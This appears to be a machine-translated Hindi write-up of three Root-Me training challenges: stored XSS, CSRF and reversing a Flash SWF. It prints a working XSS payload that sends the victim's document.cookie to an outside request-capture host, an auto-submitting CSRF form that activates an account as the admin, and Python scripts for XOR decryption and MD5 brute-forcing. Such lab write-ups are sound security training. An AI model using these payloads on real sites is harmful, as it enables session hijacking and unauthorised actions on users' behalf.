XSS, CSRF और फ्लैश प्रमाणीकरण। समस्या को हल करने के साथ r0ot-mi वेब - क्लाइंट। भाग २

इस लेख में, हम संग्रहीत XSS के माध्यम से कुकीज़ को हाईजैक करते हैं, एक CSRF हमले से निपटते हैं और एक फ़्लैश SWF फ़ाइल को उल्टा करते हैं। पिछले लेखों के लिंक:

भाग 1: वेब - जावास्क्रिप्ट प्रमाणीकरण, स्थापन और मूल कोड। समस्या को हल करने के साथ r0ot-mi वेब - क्लाइंट।

XSS संग्रहीत

असाइनमेंट पर, हमें व्यवस्थापक कुकीज़ को हथियाने की आवश्यकता है। हम साइट खोलते हैं। हम एक ऐसा रूप देखते हैं जहाँ आपको एक शीर्षक और एक संदेश दर्ज करने की आवश्यकता होती है। आइए यह देखने के लिए दर्ज करें कि फॉर्म पर हमारा इनपुट कैसे प्रदर्शित होता है।





So. आइए XSS पर जांच करने का प्रयास करें। पेलोड के रूप में, मैं सामान्य अलर्ट का उपयोग करूंगा।

<script>alert(1);</script> 

जैसा कि आप देख सकते हैं, अलर्ट विंडो हमें प्रदर्शित की गई थी, यानी एम्बेडेड जावास्क्रिप्ट कोड ने काम किया।



चूंकि ये एक्सएसएस संग्रहीत हैं, इसलिए अन्य उपयोगकर्ताओं की कुकीज़ को अपहृत करना संभव है। यदि आपके पास वैश्विक नेटवर्क में अपना सर्वर नहीं है, तो आप इस साइट का उपयोग कर सकते हैं।



यहां हमें एक पता दिया गया है जहां हम इस पते पर सभी अनुरोधों का पालन कर सकते हैं। अब अगला पेलोड पेश करें।

 <script> document.write("<img src='https://en0q0bu21ne0wq.x.pipedream.net/?cookie=" + document.cookie + "'></img>"); </script> 

जब उपयोगकर्ता इस कोड के साथ एक पृष्ठ खोलता है, तो एजेंट चित्र को डाउनलोड करने और इस पते पर एक अनुरोध निष्पादित करने का प्रयास करेगा। वह एक पैरामीटर के रूप में अपनी कुकी का उपयोग करेगा। हम तब पैरामीटर को देखते हैं जिसके साथ अनुरोध आया था - यह कुकी होगी।



कुकीज़ अपहरण क्यों खतरनाक है? हमारे ब्राउज़र में इस साइट के लिए कुकीज़ डालने से, हम प्रमाणीकरण प्रक्रिया को छोड़ते हुए, इस उपयोगकर्ता की ओर से साइट में प्रवेश करेंगे।

CSRF

असाइनमेंट पर, हमें आपका खाता सक्रिय करना होगा। आइए साइट को देखें। हमारी मुलाकात एक प्राधिकरण फॉर्म से होती है।



हम पंजीकरण का चयन करते हैं, और साइट पर पंजीकरण करते हैं।



हमें बताया जाता है कि जब व्यवस्थापक हमारे खाते को सक्रिय कर देगा तब हमें पूरी पहुँच प्राप्त होगी।





जब आप बॉक्स को स्वयं जांचने का प्रयास करते हैं, तो हमें एक संदेश मिलता है कि हम व्यवस्थापक नहीं हैं।



लेकिन हम व्यवस्थापक से संपर्क कर सकते हैं, अर्थात्, वह पृष्ठ खोल देगा। CSRF का अर्थ है कि उपयोगकर्ता इसे जाने बिना ही क्रिया करता है। यही है, हम उसे पहले से ही भरे हुए फॉर्म को जमा करने के लिए बाध्य कर सकते हैं। आइए देखें कि क्या कोई टोकन है जो सर्वर द्वारा सेट और चेक किया गया है - ऐसे हमलों के खिलाफ सुरक्षा के रूप में। यह हर बार अलग होता है।



कोई टोकन नहीं है। पेलोड का यह रूप इस फॉर्म से बाहर आ जाएगा।

 <form id="form" action="http://challenge01.root-me.org/web-client/ch22/?action=profile" method="post" enctype="multipart/form-data"> <input type="text" name="username" value="ralf"> <input type="checkbox" name="status" checked > <button type="submit">Submit</button> </form> <script>document.getElementById("form").submit()</script> 

यहां एक फॉर्म पहले से ही हमारे डेटा से भरा है, जिसमें एक सक्रिय चेकमार्क है। जावास्क्रिप्ट कोड पेज को लोड करने के बाद इसे क्रमशः प्रशासक की ओर से भेजेगा, जिसने इसे देखा था।





कुछ समय बाद, हम पृष्ठ को ताज़ा करते हैं। हमारा खाता सक्रिय कर दिया गया है।

फ़्लैश

हमें एक वैध कोड खोजने की आवश्यकता है। पेज को ओपन करते है। हम किसी प्रकार के कोड तंत्र से मिलते हैं।



आइए कोड पर एक नज़र डालें।



हम देखते हैं कि जेएस पर परिवर्तित कोड की जाँच की जाती है, जिसे हम पेश करते हैं। यह रूपांतरण एल्गोरिदम का पता लगाने के लिए बना हुआ है। कोड में भी swf फ़ाइल का लिंक है। इसे डाउनलोड करते हैं।



हम देखते हैं कि यह एक संकुचित मैक्रोमीडिया फ्लैश है। ऐसी फ़ाइलों को उलटने के लिए, मैं JPEXS का उपयोग करना पसंद करता हूँ।



हम मुख्य स्क्रिप्ट पाते हैं।



चलो इसे अलग ले जाओ।



यह डेटा को किसी अन्य नेस्टेड स्क्रिप्ट से लोड करता है, उन्हें कुंजी से काटता है और निष्पादन के लिए भेजता है। चलो करते हैं। सबसे पहले हम यह डेटा पाते हैं।



और फिर एक अलग फ़ाइल में निर्यात करें।



अब उन्हें कुंजी के साथ सम्‍मिलित करें।

 f = open('1_RootMe_EmbeddedSWF.bin', 'r') swf_crypt = f.read() f.close() key = 'rootmeifyoucan' swf_decrypt = '' for i in range(len(swf_crypt)): swf_decrypt += chr(ord(swf_crypt[i]) ^ ord(key[i%len(key)])) f = open('NewEmbedded.swf', 'w') f.write(swf_decrypt) f.close() 

हमें एक नई फ़ाइल मिलती है। इसे JPEXS में खोलें।



हम मुख्य स्क्रिप्ट ढूंढते हैं और विश्लेषण करना शुरू करते हैं।



चूंकि आपको अभी भी कोड लिखना है। मैं इसके कुछ हिस्सों को प्रकाशित करूंगा।

 but1 = 11266775 but2 = 11146309 but3 = 7884889 but4 = 8049718 Hash = 'dbbcd6ee441aa6d2889e6e3cae6adebe' 

यहां हम निर्देशांक में प्रत्येक बटन का कोड और उसका स्थान देखते हैं। इससे हमें यह समझने में मदद मिलेगी कि कौन सा बटन किस कोड का है।



हम इससे सीखते हैं कि कोड की लंबाई 12. के बराबर या उससे अधिक होनी चाहिए और अंतिम मान एमडीआर हैश का उल्टे स्ट्रिंग से है।

 from hashlib import * import itertools for var in itertools.product('1234', repeat=12): ... ... if len(code) >= 12: break h = md5(code[::-1].encode()).hexdigest() 

वर्णन करने के बजाय, मैं बस इस कोड को python'e में दूंगा।

 code = "" for char in var: if char == '1': code += format((but1 >> 16 & 0xFF), '02X') elif char == '2': code += format((but2 >> 8 & 0xFF), '02X') elif char == '3': code += format((but3 >> 0 & 0xFF), '02X') elif char == '4': if len(code) > 1: code = code[0:-1] 

इस प्रकार, हमें 4 ^ 12 = 16777216 विकल्पों को हल करना होगा। एक ट्रिफ़ल।

 from hashlib import * import itertools but1 = 11266775 but2 = 11146309 but3 = 7884889 but4 = 8049718 Hash = 'dbbcd6ee441aa6d2889e6e3cae6adebe' for var in itertools.product('1234', repeat=12): code = "" for char in var: if char == '1': code += format((but1 >> 16 & 0xFF), '02X') elif char == '2': code += format((but2 >> 8 & 0xFF), '02X') elif char == '3': code += format((but3 >> 0 & 0xFF), '02X') elif char == '4': if len(code) > 1: code = code[0:-1] if len(code) >= 12: break h = md5(code[::-1].encode()).hexdigest() print("Password: %s, code: %s" % (var, code)) if h == Hash: print('Correct password:' + "".join(var)) Break 

एक पासवर्ड और कोड मिला।

आगे और अधिक जटिल ... आप टेलीग्राम पर हमसे जुड़ सकते हैं। आइए एक समुदाय को एक साथ रखें जिसमें ऐसे लोग होंगे जो आईटी के कई क्षेत्रों में पारंगत हैं, फिर हम किसी भी आईटी और सूचना सुरक्षा मुद्दों पर हमेशा एक दूसरे की मदद कर सकते हैं।